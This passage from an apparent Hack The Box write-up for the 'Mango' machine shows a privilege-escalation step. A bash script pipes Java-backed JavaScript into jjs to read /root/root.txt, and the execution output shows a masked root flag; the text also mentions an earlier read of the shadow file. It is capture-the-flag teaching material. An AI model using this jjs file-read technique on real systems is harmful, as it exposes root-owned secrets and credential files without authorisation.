uid=4000000000(admin) gid=1001(admin) groups=1001(admin)
bash-4.4$ cd /root
cd /root
bash: cd: /root: Permission denied
bash-4.4$
Per our test to the shadow file, let's try now the file-read, but this time directly to the root flag in a bash script and see what we get. Let’s remember one thing about HTB machines; typically the root flag files are found in the root user home directory /root.
Script
#!/bin/bash
echo 'var BufferedReader = Java.type("java.io.BufferedReader")
var FileReader = Java.type("java.io.FileReader")
var br = new BufferedReader(new FileReader("/root/root.txt"))
while ((line = br.readLine()) != null) { print(line); }' | jjs
Execution
admin@mango:/home/admin$ sh test.sh
Warning: The jjs tool is planned to be removed from a future JDK release
jjs> var BufferedReader = Java.type("java.io.BufferedReader");
jjs> var FileReader = Java.type("java.io.FileReader");
jjs> var br = new BufferedReader(new FileReader("/root/root.txt"));
jjs> while ((line = br.readLine()) != null) { print(line); }
8a8ef**********************9ab15
jjs> admin@mango:/home/admin$
AND WE GOT THE ROOT FLAG!!!!!!
This basically means we can read files owned by root through jjs, but we cannot get a reverse shell as root.
